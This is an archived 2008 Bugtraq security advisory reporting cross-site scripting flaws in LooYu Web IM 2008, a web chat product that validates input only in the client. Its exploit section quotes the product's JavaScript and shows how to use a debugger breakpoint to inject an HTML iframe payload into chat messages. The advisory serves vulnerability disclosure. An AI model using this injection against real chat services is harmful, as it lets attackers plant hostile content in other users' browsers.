LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities
- From: xsp <xisigr@xxxxxxxxx>
- Date: Fri, 19 Sep 2008 14:52:35 +0800
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to :subject:mime-version:content-type:content-transfer-encoding :content-disposition; bh=ls3Nj5EcbBJWcoX/mX+q4NC4ZA1kjcZ8hWeCSpuoeWY=; b=LCEr180H+o/VWF/8TR9HeDtGxCfLD0x08+TV4oGw2/lU8evr5+a4B7gD8S2/1ct3oa H8z2621D6z3VMiZCSNUYgRC3cF3darQAzeLuAzVLdPzaTLrV8WgREjm0sYTfH9KP/3je LInj8Fspgnlg/kmXqN2/sKPqQZKgyuSfvUmBw=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition; b=U6/v4msFU/m0aCr8ro0L6SX5NptrM7sYtW4WuZuyFYhceoUChVMAlPXFBjfczRE82f 0FzS84sxOmak4XecbtlAqViYREV2QrSrMOf74oGIO7LHaFQjsU9UBZPlA2w1hWOSKmnc ixqso/R4wg3FpQ7Gu28aEZYE4zJx3ynM02J7Y=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Application: LooYu Web IM
Vendor: www.looyu.com
Corporation: DuoYou, Inc.
Version: Latest: (19 SEP 2008) - Home Edition, Enterprise & Professional
Description: LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities
Background:
==============
LooYu is a web-based group chat tool that lets invite a client,
colleague, or vendor to chat, and collaborate.
Vulnerability:
==============
They do not properly sanitize the potentially malicious input content
to be rendered and, as a result, an attacker might provide malicious
HTML content as part of an IM message. There is a client-side only
input validation.
Exploit:
==============
1. newVisitorChat.js
(1)function sendMessage() {
..................
..................
save_message(replaceHtml(msg));
}
(2)function save_message(msg) {
var m = msg; //BREAKPOINT
for(var e in emots){
if(m.indexOf(e)!=-1){
m = m.replace(e,emots[e]);
}
}
addMsg_chat(m, "you"/*getShortId(visitorId)*/, "visitor",null,'send');
..................
..................
}
SET BREAKPOINT(firebug, etc), AND SET NEW VALUE:
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"
2. newCusChat.js
(1)function sendMessage() {
..................
..................
save_message(replaceHtml(msg));
..................
..................
}
(2)function saveMessage(msg) {
showLocalMessage(msg);
Chat.addMessage(companyId,currentVisitor.chatId,customerId,currentVisitor.getTar(),
msg,{callback:function(m){
save_message_do(currentVisitor,m); //BREAKPOINT
}});
}
SET BREAKPOINT(firebug, etc), AND SET NEW VALUE:
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"
=========================
xisigr[topsec]
xisigr@xxxxxxxxx
--
----xisigr----